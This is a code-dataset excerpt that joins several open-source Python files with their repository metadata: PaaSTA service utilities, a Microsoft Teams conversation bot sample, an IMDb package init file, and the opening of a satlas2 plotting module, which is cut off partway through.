    sha = final_segment.split("-")[-1]
    return sha if long else sha[:8]
def get_code_sha_from_dockerurl(docker_url: str) -> str:
    """Short git sha from a docker url, prefixed with "git".

    The short form is used because it is embedded in marathon app names,
    which are length-limited. Falls back to "gitUNKNOWN" on any failure.
    """
    try:
        short_sha = get_git_sha_from_dockerurl(docker_url, long=False)
        return f"git{short_sha}"
    except Exception:
        return "gitUNKNOWN"
def is_under_replicated(
    num_available: int, expected_count: int, crit_threshold: int
) -> Tuple[bool, float]:
    """Decide whether availability has dropped below a critical percentage.

    :param num_available: how many things are up
    :param expected_count: how many things should be up
    :param crit_threshold: critical percentage, 0-100
    :returns: ``(under_replicated, availability_ratio)``; expecting zero
        instances counts as fully available (ratio 100).
    """
    if expected_count == 0:
        ratio = 100.0
    else:
        ratio = num_available / float(expected_count) * 100
    return (ratio < int(crit_threshold), ratio)
def deploy_blacklist_to_constraints(
    deploy_blacklist: DeployBlacklist,
) -> List[Constraint]:
    """Translate a location blacklist into marathon ``UNLIKE`` constraints.

    https://mesosphere.github.io/marathon/docs/constraints.html#unlike-operator

    :param deploy_blacklist: list of ``(location_type, location)`` pairs
    :returns: one ``[location_type, "UNLIKE", location]`` constraint per pair
    """
    return [[entry[0], "UNLIKE", entry[1]] for entry in deploy_blacklist]
def deploy_whitelist_to_constraints(
    deploy_whitelist: DeployWhitelist,
) -> List[Constraint]:
    """Translate a location whitelist into a marathon ``LIKE`` constraint.

    https://mesosphere.github.io/marathon/docs/constraints.html#like-operator

    :param deploy_whitelist: ``(location_type, [locations])`` tuple, or ``None``
    :returns: a single-constraint list, or ``[]`` when no whitelist is set
    """
    if deploy_whitelist is None:
        return []
    location_type, locations = deploy_whitelist
    return [[location_type, "LIKE", "|".join(locations)]]
def terminal_len(text: str) -> int:
    """Return the on-terminal width of *text*, ignoring ANSI escape sequences."""
    visible = remove_ansi_escape_sequences(text)
    return len(visible)
def format_table(
    rows: Iterable[Union[str, Sequence[str]]], min_spacing: int = 2
) -> List[str]:
    """Formats a table for use on the command line.

    :param rows: List of rows, each of which can either be a tuple of strings containing the row's values, or a string
                 to be inserted verbatim. Each row (except literal strings) should be the same number of elements as
                 all the others.
    :param min_spacing: Minimum number of spaces between adjacent columns.
    :returns: A list of strings, one per row, each formatted as a table row.
    """
    # NOTE(review): ``rows`` is iterated twice below, so a one-shot generator
    # would yield a wrong result -- callers appear to pass concrete sequences.
    list_rows = [r for r in rows if not isinstance(r, str)]
    # If all of the rows are strings, we have nothing to do, so short-circuit.
    if not list_rows:
        return cast(List[str], rows)
    # Column width = widest cell of that column, measured in visible terminal
    # columns (ANSI escapes excluded by terminal_len).
    widths = []
    for i in range(len(list_rows[0])):
        widths.append(max(terminal_len(r[i]) for r in list_rows))
    expanded_rows = []
    for row in rows:
        if isinstance(row, str):
            # Literal strings become a single-cell row, inserted verbatim.
            expanded_rows.append([row])
        else:
            expanded_row = []
            for i, cell in enumerate(row):
                if i == len(row) - 1:
                    # The last column is never padded.
                    padding = ""
                else:
                    padding = " " * (widths[i] - terminal_len(cell))
                expanded_row.append(cell + padding)
            expanded_rows.append(expanded_row)
    return [(" " * min_spacing).join(r) for r in expanded_rows]
_DeepMergeT = TypeVar("_DeepMergeT", bound=Any)


class DuplicateKeyError(Exception):
    """Raised when overrides and defaults share a key and duplicates are forbidden."""


def deep_merge_dictionaries(
    overrides: _DeepMergeT, defaults: _DeepMergeT, allow_duplicate_keys: bool = True
) -> _DeepMergeT:
    """
    Merges two dictionaries.

    Values from *overrides* win on conflicts; nested dictionaries are merged
    key-by-key rather than replaced wholesale.  *defaults* is deep-copied
    first, so neither input is mutated.

    :raises DuplicateKeyError: when *allow_duplicate_keys* is false and a key
        maps to a non-mergeable value in both inputs.
    """
    merged = copy.deepcopy(defaults)
    # Explicit work list of (source, target) dict pairs still to merge.
    pending: List[Tuple[Dict, Dict]] = [(overrides, merged)]
    while pending:
        source, target = pending.pop()
        for key, value in source.items():
            if key not in target:
                target[key] = value
            elif isinstance(value, dict) and isinstance(target[key], dict):
                # Both sides are dicts: descend and merge their contents.
                pending.append((value, target[key]))
            elif allow_duplicate_keys:
                target[key] = value
            else:
                raise DuplicateKeyError(
                    f"defaults and overrides both have key {key}"
                )
    return merged
class ZookeeperPool:
    """
    A context manager that shares the same KazooClient with its children. The first nested context manager
    creates and deletes the client and shares it with any of its children. This allows to place a context
    manager over a large number of zookeeper calls without opening and closing a connection each time.
    GIL makes this 'safe'.
    """
    # Depth of currently-active nested ``with`` blocks.  Both attributes are
    # class-level, so the connection is shared process-wide, not per instance.
    counter: int = 0
    zk: KazooClient = None
    @classmethod
    def __enter__(cls) -> KazooClient:
        # Lazily create and start the shared read-only client on first entry.
        if cls.zk is None:
            cls.zk = KazooClient(
                hosts=load_system_paasta_config().get_zk_hosts(), read_only=True
            )
            cls.zk.start()
        cls.counter = cls.counter + 1
        return cls.zk
    @classmethod
    def __exit__(cls, *args: Any, **kwargs: Any) -> None:
        cls.counter = cls.counter - 1
        # Only the outermost ``with`` block tears the connection down; inner
        # blocks just decrement the nesting counter.
        if cls.counter == 0:
            cls.zk.stop()
            cls.zk.close()
            cls.zk = None
def calculate_tail_lines(verbose_level: int) -> int:
    """Map a verbosity level to a number of log lines to tail.

    Levels 0 and 1 tail nothing; each further level multiplies the count by
    ten (2 -> 10, 3 -> 100, ...).
    """
    return 0 if verbose_level <= 1 else 10 ** (verbose_level - 1)
def is_deploy_step(step: str) -> bool:
    """
    Returns true if the given step deploys to an instancename
    Returns false if the step is a predefined step-type, e.g. itest or command-*
    """
    if step.startswith("command-"):
        return False
    return step not in DEPLOY_PIPELINE_NON_DEPLOY_STEPS
_UseRequestsCacheFuncT = TypeVar("_UseRequestsCacheFuncT", bound=Callable)


def use_requests_cache(
    cache_name: str, backend: str = "memory", **kwargs: Any
) -> Callable[[_UseRequestsCacheFuncT], _UseRequestsCacheFuncT]:
    """Decorator factory that runs the wrapped function with a requests_cache installed.

    The cache named *cache_name* (using *backend* and any extra
    ``requests_cache`` options supplied in ``**kwargs``) is installed before
    the call and uninstalled afterwards -- even when the wrapped function
    raises, so an exception can no longer leave the cache installed for
    unrelated requests.

    :param cache_name: name passed to ``requests_cache.install_cache``
    :param backend: requests_cache backend identifier (default in-memory)
    :returns: a decorator that preserves the wrapped function's metadata
    """

    def wrap(fun: _UseRequestsCacheFuncT) -> _UseRequestsCacheFuncT:
        @wraps(fun)
        def fun_with_cache(*args: Any, **fun_kwargs: Any) -> Any:
            # BUGFIX: the original's inner **kwargs shadowed the factory-level
            # **kwargs, so install_cache received the wrapped call's keyword
            # arguments instead of the configured cache options.
            requests_cache.install_cache(cache_name, backend=backend, **kwargs)
            try:
                return fun(*args, **fun_kwargs)
            finally:
                requests_cache.uninstall_cache()

        return cast(_UseRequestsCacheFuncT, fun_with_cache)

    return wrap
def long_job_id_to_short_job_id(long_job_id: str) -> str:
    """Drop the hash components of a full job id, keeping only service.instance."""
    service, instance = decompose_job_id(long_job_id)[:2]
    return compose_job_id(service, instance)
def mean(iterable: Collection[float]) -> float:
    """
    Returns the average value of an iterable
    (an empty collection raises ZeroDivisionError, as before).
    """
    total = sum(iterable)
    return total / len(iterable)
def prompt_pick_one(sequence: Collection[str], choosing: str) -> str:
    """Interactively ask the user to pick one item from *sequence*.

    Exits the process with status 1 when no TTY is attached, when there is
    nothing to choose from, or when the user quits/interrupts.  A
    single-element sequence is returned immediately without prompting.

    :param sequence: the available options
    :param choosing: human-readable name of the kind of thing being chosen
    :returns: the selected item
    """
    if not sys.stdin.isatty():
        print(
            # NOTE(review): the two literals concatenate without a space
            # ("...ask.Please..."); left untouched -- it is a runtime string.
            "No {choosing} specified and no TTY present to ask."
            "Please specify a {choosing} using the cli.".format(choosing=choosing),
            file=sys.stderr,
        )
        sys.exit(1)
    if not sequence:
        print(
            f"PaaSTA needs to pick a {choosing} but none were found.", file=sys.stderr
        )
        sys.exit(1)
    global_actions = [str("quit")]
    # The menu wants (value, label) pairs; here value and label are the same.
    choices = [(item, item) for item in sequence]
    if len(choices) == 1:
        return choices[0][0]
    chooser = choice.Menu(choices=choices, global_actions=global_actions)
    chooser.title = 'Please pick a {choosing} from the choices below (or "quit" to quit):'.format(
        choosing=str(choosing)
    )
    try:
        result = chooser.ask()
    except (KeyboardInterrupt, EOFError):
        # Treat Ctrl-C / Ctrl-D like an explicit quit.
        print("")
        sys.exit(1)
    # A tuple result is a global action; the only one registered is "quit".
    if isinstance(result, tuple) and result[1] == str("quit"):
        sys.exit(1)
    else:
        return result
def to_bytes(obj: Any) -> bytes:
    """Coerce *obj* to UTF-8 bytes: bytes pass through, str is encoded, anything else is str()-ed first."""
    if isinstance(obj, bytes):
        return obj
    text = obj if isinstance(obj, str) else str(obj)
    return text.encode("UTF-8")
_TimeoutFuncRetType = TypeVar("_TimeoutFuncRetType")
def timeout(
    # NOTE: the error_message default is evaluated once at import time.
    seconds: int = 10,
    error_message: str = os.strerror(errno.ETIME),
    use_signals: bool = True,
) -> Callable[[Callable[..., _TimeoutFuncRetType]], Callable[..., _TimeoutFuncRetType]]:
    """Decorator factory that aborts the wrapped call with TimeoutError after *seconds*.

    With ``use_signals=True`` a SIGALRM handler is installed around the call
    (NOTE(review): SIGALRM is Unix-only and must run in the main thread --
    confirm for any new call sites).  With ``use_signals=False`` the call is
    executed by the thread-based ``_Timeout`` helper instead.
    """
    if use_signals:
        def decorate(
            func: Callable[..., _TimeoutFuncRetType]
        ) -> Callable[..., _TimeoutFuncRetType]:
            def _handle_timeout(signum: int, frame: FrameType) -> None:
                raise TimeoutError(error_message)
            def wrapper(*args: Any, **kwargs: Any) -> _TimeoutFuncRetType:
                signal.signal(signal.SIGALRM, _handle_timeout)
                signal.alarm(seconds)
                try:
                    result = func(*args, **kwargs)
                finally:
                    # Always cancel the pending alarm, even on exceptions.
                    signal.alarm(0)
                return result
            return wraps(func)(wrapper)
    else:
        def decorate(
            func: Callable[..., _TimeoutFuncRetType]
        ) -> Callable[..., _TimeoutFuncRetType]:
            # https://github.com/python/mypy/issues/797
            return _Timeout(func, seconds, error_message)  # type: ignore
    return decorate
class _Timeout:
    """Thread-based timeout wrapper used by ``timeout(use_signals=False)``.

    Runs the wrapped function in a daemon thread and polls for completion;
    raises TimeoutError once the deadline passes.  NOTE(review): the worker
    thread is not killed on timeout -- it keeps running in the background
    until the function returns or the process exits.
    """
    def __init__(
        self,
        function: Callable[..., _TimeoutFuncRetType],
        seconds: float,
        error_message: str,
    ) -> None:
        self.seconds = seconds
        # Single-use channel carrying either (True, result) on success or
        # (False, exc_info) on failure, so errors re-raise in the caller.
        self.control: queue.Queue[
            Tuple[bool, Union[_TimeoutFuncRetType, Tuple]]
        ] = queue.Queue()
        self.function = function
        self.error_message = error_message
    def run(self, *args: Any, **kwargs: Any) -> None:
        # Try and put the result of the function into the q
        # if an exception occurs then we put the exc_info instead
        # so that it can be raised in the main thread.
        try:
            self.control.put((True, self.function(*args, **kwargs)))
        except Exception:
            self.control.put((False, sys.exc_info()))
    def __call__(self, *args: Any, **kwargs: Any) -> _TimeoutFuncRetType:
        # Daemon thread: does not block interpreter shutdown if it hangs.
        self.func_thread = threading.Thread(target=self.run, args=args, kwargs=kwargs)
        self.func_thread.daemon = True
        self.timeout = self.seconds + time.time()
        self.func_thread.start()
        return self.get_and_raise()
    def get_and_raise(self) -> _TimeoutFuncRetType:
        # Poll every 10 ms until the worker finishes or the deadline passes.
        while not self.timeout < time.time():
            time.sleep(0.01)
            if not self.func_thread.is_alive():
                ret = self.control.get()
                if ret[0]:
                    return cast(_TimeoutFuncRetType, ret[1])
                else:
                    # Re-raise the worker's exception with its traceback.
                    _, e, tb = cast(Tuple, ret[1])
                    raise e.with_traceback(tb)
        raise TimeoutError(self.error_message)
def suggest_possibilities(
    word: str, possibilities: Iterable[str], max_suggestions: int = 3
) -> str:
    """Build a "Did you mean ...?" hint for *word* from close matches in *possibilities*.

    Returns an empty string when nothing is similar enough.
    """
    matches = cast(
        List[str],
        difflib.get_close_matches(
            word=word, possibilities=set(possibilities), n=max_suggestions
        ),
    )
    if not matches:
        return ""
    if len(matches) == 1:
        return f"\nDid you mean: {matches[0]}?"
    return f"\nDid you mean one of: {', '.join(matches)}?"
def list_services(soa_dir: str = DEFAULT_SOA_DIR) -> Sequence[str]:
    """Returns a sorted list of all services (one per directory entry in *soa_dir*)."""
    entries = os.listdir(os.path.abspath(soa_dir))
    return sorted(entries)
def get_possible_launched_by_user_variable_from_env() -> str:
    """Best guess at the human running this process: $SUDO_USER when set, else the login user."""
    sudo_user = os.getenv("SUDO_USER")
    return sudo_user if sudo_user else getpass.getuser()
def load_all_configs(
    cluster: str, file_prefix: str, soa_dir: str
) -> Mapping[str, Mapping[str, Any]]:
    """Read the ``<file_prefix>-<cluster>`` extra service information for every
    service directory found in *soa_dir*.

    :returns: mapping of service name -> parsed configuration dict
    """
    return {
        service: service_configuration_lib.read_extra_service_information(
            service, f"{file_prefix}-{cluster}", soa_dir=soa_dir
        )
        for service in os.listdir(soa_dir)
    }
def ldap_user_search(
    cn: str,
    search_base: str,
    search_ou: str,
    ldap_host: str,
    username: str,
    password: str,
) -> Set[str]:
    """Connects to LDAP and raises a subclass of LDAPOperationResult when it fails

    Returns the sAMAccountName of every enabled member of group *cn* (located
    under *search_ou*), searching the subtree below *search_base*.
    """
    # Require a verified TLS connection to the directory server.
    tls_config = ldap3.Tls(
        validate=ssl.CERT_REQUIRED, ca_certs_file="/etc/ssl/certs/ca-certificates.crt"
    )
    server = ldap3.Server(ldap_host, use_ssl=True, tls=tls_config)
    conn = ldap3.Connection(
        server, user=username, password=password, raise_exceptions=True
    )
    conn.bind()
    # userAccountControl=514 is NORMAL_ACCOUNT|ACCOUNTDISABLE, so disabled
    # accounts are excluded (presumably Active Directory -- confirm).
    search_filter = f"(&(memberOf=CN={cn},{search_ou})(!(userAccountControl=514)))"
    entries = conn.extend.standard.paged_search(
        search_base=search_base,
        search_scope=ldap3.SUBTREE,
        search_filter=search_filter,
        attributes=["sAMAccountName"],
        paged_size=1000,
        time_limit=10,
    )
    return {entry["attributes"]["sAMAccountName"] for entry in entries}
def _reorder_docker_volumes(volumes: List[DockerVolume]) -> List[DockerVolume]:
    """De-duplicate volumes by (containerPath, hostPath) -- last one wins -- and return them sorted."""
    unique = {}
    for volume in volumes:
        key = volume["containerPath"].rstrip("/") + volume["hostPath"].rstrip("/")
        unique[key] = volume
    return sort_dicts(unique.values())
| 33.742472 | 120 | 0.643167 |
b94b40136f494a017c13ffbbfb05cbe502e960da | 8,664 | py | Python | samples/python/57.teams-conversation-bot/bots/teams_conversation_bot.py | Aliacf21/BotBuilder-Samples | be48548edafd4efdc074f5a59ef2bb3af735ad9a | [
"MIT"
] | 1,998 | 2019-05-07T06:33:22.000Z | 2022-03-31T12:59:15.000Z | samples/python/57.teams-conversation-bot/bots/teams_conversation_bot.py | Aliacf21/BotBuilder-Samples | be48548edafd4efdc074f5a59ef2bb3af735ad9a | [
"MIT"
] | 1,303 | 2019-05-06T22:15:41.000Z | 2022-03-31T21:45:38.000Z | samples/python/57.teams-conversation-bot/bots/teams_conversation_bot.py | stevkan/BotBuilder-Samples | 75a21b412d8873906bed3460f7c5f0940a067d58 | [
"MIT"
] | 2,820 | 2016-09-21T03:47:43.000Z | 2019-05-03T15:12:46.000Z | # Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
import os
import json
from typing import List
from botbuilder.core import CardFactory, TurnContext, MessageFactory
from botbuilder.core.teams import TeamsActivityHandler, TeamsInfo
from botbuilder.schema import CardAction, HeroCard, Mention, ConversationParameters, Attachment, Activity
from botbuilder.schema.teams import TeamInfo, TeamsChannelAccount
from botbuilder.schema._connector_client_enums import ActionTypes
ADAPTIVECARDTEMPLATE = "resources/UserMentionCardTemplate.json"
class TeamsConversationBot(TeamsActivityHandler):
    """Teams conversation demo bot.

    Routes incoming message text (after stripping the bot @mention) to demo
    commands: "mention me", "mention", "update", "message", "who", "delete";
    any other text sends the welcome hero card.
    """

    def __init__(self, app_id: str, app_password: str):
        # Credentials are required to proactively create conversations
        # (see _message_all_members).
        self._app_id = app_id
        self._app_password = app_password

    async def on_teams_members_added(  # pylint: disable=unused-argument
        self,
        teams_members_added: List[TeamsChannelAccount],
        team_info: TeamInfo,
        turn_context: TurnContext,
    ):
        """Welcome each newly added member, skipping the bot itself."""
        for member in teams_members_added:
            if member.id != turn_context.activity.recipient.id:
                await turn_context.send_activity(
                    f"Welcome to the team { member.given_name } { member.surname }. "
                )

    async def on_message_activity(self, turn_context: TurnContext):
        """Dispatch on keywords contained in the (lowercased) message text."""
        TurnContext.remove_recipient_mention(turn_context.activity)
        text = turn_context.activity.text.strip().lower()
        # "mention me" must be tested before "mention" -- substring checks.
        if "mention me" in text:
            await self._mention_adaptive_card_activity(turn_context)
            return
        if "mention" in text:
            await self._mention_activity(turn_context)
            return
        if "update" in text:
            await self._send_card(turn_context, True)
            return
        if "message" in text:
            await self._message_all_members(turn_context)
            return
        if "who" in text:
            await self._get_member(turn_context)
            return
        if "delete" in text:
            await self._delete_card_activity(turn_context)
            return
        await self._send_card(turn_context, False)
        return

    async def _mention_adaptive_card_activity(self, turn_context: TurnContext):
        """Send an Adaptive Card that @mentions the message sender."""
        # BUGFIX: was ``TeamsChannelAccount: member = None`` -- an annotated
        # assignment that bound the imported class name to None instead of
        # declaring the ``member`` local.
        member: TeamsChannelAccount = None
        try:
            member = await TeamsInfo.get_member(
                turn_context, turn_context.activity.from_property.id
            )
        except Exception as e:
            if "MemberNotFoundInConversation" in e.args[0]:
                await turn_context.send_activity("Member not found.")
                return
            else:
                raise
        card_path = os.path.join(os.getcwd(), ADAPTIVECARDTEMPLATE)
        with open(card_path, "rb") as in_file:
            template_json = json.load(in_file)
        # Fill the template placeholders with the sender's details.
        for t in template_json["body"]:
            t["text"] = t["text"].replace("${userName}", member.name)
        for e in template_json["msteams"]["entities"]:
            e["text"] = e["text"].replace("${userName}", member.name)
            e["mentioned"]["id"] = e["mentioned"]["id"].replace("${userUPN}", member.user_principal_name)
            e["mentioned"]["id"] = e["mentioned"]["id"].replace("${userAAD}", member.additional_properties["aadObjectId"])
            e["mentioned"]["name"] = e["mentioned"]["name"].replace("${userName}", member.name)
        adaptive_card_attachment = Activity(
            attachments=[CardFactory.adaptive_card(template_json)]
        )
        await turn_context.send_activity(adaptive_card_attachment)

    async def _mention_activity(self, turn_context: TurnContext):
        """Reply with a plain message that @mentions the sender."""
        mention = Mention(
            mentioned=turn_context.activity.from_property,
            text=f"<at>{turn_context.activity.from_property.name}</at>",
            type="mention",
        )
        reply_activity = MessageFactory.text(f"Hello {mention.text}")
        # Round-trip through (de)serialization so the entity is a fresh copy.
        reply_activity.entities = [Mention().deserialize(mention.serialize())]
        await turn_context.send_activity(reply_activity)

    async def _send_card(self, turn_context: TurnContext, isUpdate):
        """Send the hero card; update the existing one when *isUpdate* is true."""
        buttons = [
            CardAction(
                type=ActionTypes.message_back,
                title="Message all members",
                text="messageallmembers",
            ),
            CardAction(type=ActionTypes.message_back, title="Who am I?", text="whoami"),
            CardAction(type=ActionTypes.message_back, title="Find me in Adaptive Card", text="mention me"),
            CardAction(
                type=ActionTypes.message_back, title="Delete card", text="deletecard"
            ),
        ]
        if isUpdate:
            await self._send_update_card(turn_context, buttons)
        else:
            await self._send_welcome_card(turn_context, buttons)

    async def _send_welcome_card(self, turn_context: TurnContext, buttons):
        """Send the initial welcome card with an update counter starting at 0."""
        buttons.append(
            CardAction(
                type=ActionTypes.message_back,
                title="Update Card",
                text="updatecardaction",
                value={"count": 0},
            )
        )
        card = HeroCard(
            title="Welcome Card", text="Click the buttons.", buttons=buttons
        )
        await turn_context.send_activity(
            MessageFactory.attachment(CardFactory.hero_card(card))
        )

    async def _send_update_card(self, turn_context: TurnContext, buttons):
        """Replace the previously sent card, bumping its click counter."""
        data = turn_context.activity.value
        data["count"] += 1
        buttons.append(
            CardAction(
                type=ActionTypes.message_back,
                title="Update Card",
                text="updatecardaction",
                value=data,
            )
        )
        card = HeroCard(
            title="Updated card", text=f"Update count {data['count']}", buttons=buttons
        )
        updated_activity = MessageFactory.attachment(CardFactory.hero_card(card))
        # Reusing the original activity id turns this into an in-place update.
        updated_activity.id = turn_context.activity.reply_to_id
        await turn_context.update_activity(updated_activity)

    async def _get_member(self, turn_context: TurnContext):
        """Tell the sender who they are according to the team roster."""
        # BUGFIX: was ``TeamsChannelAccount: member = None`` (see above).
        member: TeamsChannelAccount = None
        try:
            member = await TeamsInfo.get_member(
                turn_context, turn_context.activity.from_property.id
            )
        except Exception as e:
            if "MemberNotFoundInConversation" in e.args[0]:
                await turn_context.send_activity("Member not found.")
            else:
                raise
        else:
            await turn_context.send_activity(f"You are: {member.name}")

    async def _message_all_members(self, turn_context: TurnContext):
        """Proactively send a private greeting to every member of the team."""
        team_members = await self._get_paged_members(turn_context)
        for member in team_members:
            conversation_reference = TurnContext.get_conversation_reference(
                turn_context.activity
            )
            conversation_parameters = ConversationParameters(
                is_group=False,
                bot=turn_context.activity.recipient,
                members=[member],
                tenant_id=turn_context.activity.conversation.tenant_id,
            )

            async def get_ref(tc1):
                conversation_reference_inner = TurnContext.get_conversation_reference(
                    tc1.activity
                )
                return await tc1.adapter.continue_conversation(
                    conversation_reference_inner, send_message, self._app_id
                )

            async def send_message(tc2: TurnContext):
                return await tc2.send_activity(
                    f"Hello {member.name}. I'm a Teams conversation bot."
                )  # pylint: disable=cell-var-from-loop

            await turn_context.adapter.create_conversation(
                conversation_reference, get_ref, conversation_parameters
            )
        await turn_context.send_activity(
            MessageFactory.text("All messages have been sent")
        )

    async def _get_paged_members(
        self, turn_context: TurnContext
    ) -> List[TeamsChannelAccount]:
        """Collect the full member list by walking the paged roster API."""
        paged_members = []
        continuation_token = None
        while True:
            current_page = await TeamsInfo.get_paged_members(
                turn_context, continuation_token, 100
            )
            continuation_token = current_page.continuation_token
            paged_members.extend(current_page.members)
            if continuation_token is None:
                break
        return paged_members

    async def _delete_card_activity(self, turn_context: TurnContext):
        """Delete the activity the user interacted with (the sent card)."""
        await turn_context.delete_activity(turn_context.activity.reply_to_id)
0192df069ab62978917a3c80ec432603e42adae7 | 93 | py | Python | imdb_rating/dependencies/__init__.py | PeregHer/imdb-rating-predictions | 39c1730fc46449aeda6984c2bdec549e42092498 | [
"MIT"
] | null | null | null | imdb_rating/dependencies/__init__.py | PeregHer/imdb-rating-predictions | 39c1730fc46449aeda6984c2bdec549e42092498 | [
"MIT"
] | null | null | null | imdb_rating/dependencies/__init__.py | PeregHer/imdb-rating-predictions | 39c1730fc46449aeda6984c2bdec549e42092498 | [
"MIT"
] | null | null | null | from .models import Movie
from .spiders import IMDBSpider
__all__ = ["Movie", "IMDBSpider"]
| 18.6 | 33 | 0.752688 |
7558e11640c88a417fe12825f28debe391ebee2e | 20,196 | py | Python | src/satlas2/plotting.py | woutergins/satlas2 | 51afdc445c8c603372bb26abe19d1eb7bd3f3f24 | [
"MIT"
] | null | null | null | src/satlas2/plotting.py | woutergins/satlas2 | 51afdc445c8c603372bb26abe19d1eb7bd3f3f24 | [
"MIT"
] | null | null | null | src/satlas2/plotting.py | woutergins/satlas2 | 51afdc445c8c603372bb26abe19d1eb7bd3f3f24 | [
"MIT"
] | null | null | null | """
Functions for the generation of plots related to the fitting results.
.. moduleauthor:: Wouter Gins <wouter.a.gins@jyu.fi>
"""
import copy
import h5py
import matplotlib as mpl
import matplotlib.pyplot as plt
import numpy as np
import uncertainties as u
from scipy import optimize
from scipy.stats import chi2
import tqdm
from .overwrite import SATLASHDFBackend
inv_color_list = ['#7acfff', '#fff466', '#00c48f', '#ff8626', '#ff9cd3', '#0093e6']
color_list = [c for c in reversed(inv_color_list)]
cmap = mpl.colors.ListedColormap(color_list)
cmap.set_over(color_list[-1])
cmap.set_under(color_list[0])
invcmap = mpl.colors.ListedColormap(inv_color_list)
invcmap.set_over(inv_color_list[-1])
invcmap.set_under(inv_color_list[0])
__all__ = ['generateChisquareMap', 'generateCorrelationPlot', 'generateWalkPlot']
def _make_axes_grid(no_variables, padding=0, cbar_size=0.5, axis_padding=0.5, cbar=True):
    """Makes a triangular grid of axes, with a colorbar axis next to it.

    Parameters
    ----------
    no_variables: int
        Number of variables for which to generate a figure.
    padding: float
        Padding around the figure (in cm).
    cbar_size: float
        Width of the colorbar (in cm).
    axis_padding: float
        Padding between axes (in cm).
    cbar: bool
        When False, no colorbar axis is created and None is returned for it.

    Returns
    -------
    fig, axes, cbar: tuple
        Tuple containing the figure, a 2D-array of axes and the colorbar axis."""
    # Convert to inches.
    padding, cbar_size, axis_padding = (padding * 0.393700787,
                                        cbar_size * 0.393700787,
                                        axis_padding * 0.393700787)
    if not cbar:
        cbar_size = 0
    # Generate the figure, convert padding to percentages.
    fig = plt.figure()
    # NOTE(review): the padding argument converted above is overwritten here,
    # so the caller-supplied padding is effectively ignored -- confirm intent.
    padding = 1
    axis_size_left = (fig.get_figwidth()-padding - 0*(no_variables + 1) * padding) / no_variables
    axis_size_up = (fig.get_figheight()-padding - 0*(no_variables + 1) * padding) / no_variables
    cbar_size = cbar_size / fig.get_figwidth()
    left_padding = padding * 0.5 / fig.get_figwidth()
    left_axis_padding = axis_padding / fig.get_figwidth()
    up_padding = padding * 0.5 / fig.get_figheight()
    up_axis_padding = 0*axis_padding / fig.get_figheight()
    axis_size_left = axis_size_left / fig.get_figwidth()
    axis_size_up = axis_size_up / fig.get_figheight()
    # Pre-allocate a 2D-array to hold the axes.
    axes = np.array([[None for _ in range(no_variables)] for _ in range(no_variables)],
                    dtype='object')
    for i, I in zip(range(no_variables), reversed(range(no_variables))):
        for j in reversed(range(no_variables)):
            # Only create axes on the lower triangle.
            if I + j < no_variables:
                # Share the x-axis with the plot on the diagonal,
                # directly above the plot.
                sharex = axes[j, j] if i != j else None
                # Share the y-axis among the 2D maps along one row,
                # but not the plot on the diagonal!
                sharey = axes[i, i-1] if (i != j and i-1 != j) else None
                # Determine the place and size of the axes
                left_edge = j * axis_size_left + left_padding
                bottom_edge = I * axis_size_up + up_padding
                if j > 0:
                    left_edge += j * left_axis_padding
                if I > 0:
                    bottom_edge += I * up_axis_padding
                a = plt.axes([left_edge, bottom_edge, axis_size_left, axis_size_up],
                             sharex=sharex, sharey=sharey)
                plt.setp(a.xaxis.get_majorticklabels(), rotation=45)
                plt.setp(a.yaxis.get_majorticklabels(), rotation=45)
            else:
                a = None
            # Diagonal plots get their y-labels on the right-hand side.
            if i == j:
                a.yaxis.tick_right()
                a.yaxis.set_label_position('right')
            axes[i, j] = a
    axes = np.array(axes)
    # Hide tick labels everywhere except on the outer edge of the triangle.
    for a in axes[:-1, :].flatten():
        if a is not None:
            plt.setp(a.get_xticklabels(), visible=False)
    for a in axes[:, 1:].flatten():
        if a is not None:
            plt.setp(a.get_yticklabels(), visible=False)
    # NOTE(review): left_edge/bottom_edge/width/height computed here are not
    # used by the cbar placement below -- they look like leftovers.
    left_edge = no_variables*(axis_size_left+left_axis_padding)+left_padding
    bottom_edge = up_padding
    width = cbar_size
    height = axis_size_up * len(axes) + up_padding * (len(axes) - 1)
    cbar_width = axis_size_left * 0.1
    if cbar:
        cbar = plt.axes([1-cbar_width-padding*0.5/fig.get_figwidth(), padding*0.5/fig.get_figheight()+axis_size_up*1.5, cbar_width, axis_size_up*(no_variables-1)-axis_size_up*0.5])
        plt.setp(cbar.get_xticklabels(), visible=False)
        plt.setp(cbar.get_yticklabels(), visible=False)
    else:
        cbar = None
    return fig, axes, cbar
def generateChisquareMap(fitter, filter=None, method='chisquare', resolution_diag=15, resolution_map=15, fit_kws={}, source=False, model=True):
    """Generates a correlation map for either the chisquare or the MLE method.

    On the diagonal, the chisquare or loglikelihood is drawn as a function of one fixed parameter.
    Refitting to the data each time gives the points on the line. A dashed line is drawn on these
    plots, with the intersection with the plots giving the correct confidence interval for the
    parameter. In solid lines, the interval estimated by the fitting routine is drawn.
    On the offdiagonal, two parameters are fixed and the model is again fitted to the data.
    The change in chisquare/loglikelihood is mapped to 1, 2 and 3 sigma contourmaps.

    Parameters
    ----------
    fitter: :class:`.Fitter`
        Fitter instance for which the chisquare map must be created.

    Other parameters
    ----------------
    filter: list of strings
        Only the parameters matching the names given in this list will be used
        to generate the maps.
    method: str
        Either 'chisquare' or an 'llh'-prefixed string; selects which statistic
        is mapped.
    resolution_diag: int
        Number of points for the line plot on each diagonal.
    resolution_map: int
        Number of points along each dimension for the meshgrids.
    fit_kws: dictionary
        Dictionary of keywords to pass on to the fitting routine.
    source: boolean
        When True, prefix axis labels with the data-source name.
    model: boolean
        When True, prefix axis labels with the model name."""
    # LaTeX templates for "value +err -err" axis titles (plain and exponent).
    title = '{}\n${}_{{-{}}}^{{+{}}}$'
    title_e = '{}\n$({}_{{-{}}}^{{+{}}})e{}$'
    # Make sure a fit result exists; fit once if the fitter is still fresh.
    try:
        orig_value = fitter.chisqr
    except AttributeError:
        fitter.fit(**fit_kws)
        orig_value = fitter.chisqr
    if method.lower().startswith('llh'):
        orig_value = fitter.llh_result
    # Save the converged state so it can be restored after all the refits.
    result = copy.deepcopy(fitter.result)
    orig_params = copy.deepcopy(fitter.lmpars)
    ranges = {}
    # Collect the varying parameters (optionally narrowed by *filter*).
    param_names = []
    no_params = 0
    for p in orig_params:
        if orig_params[p].vary and (filter is None or any([f in p for f in filter])):
            no_params += 1
            param_names.append(p)
    fig, axes, cbar = _make_axes_grid(no_params, axis_padding=0, cbar=no_params > 1)
    # Parameter names follow the 'source___model___name' convention.
    split_names = [name.split('___') for name in param_names]
    sources = [name[0] for name in split_names]
    models = [name[1] for name in split_names]
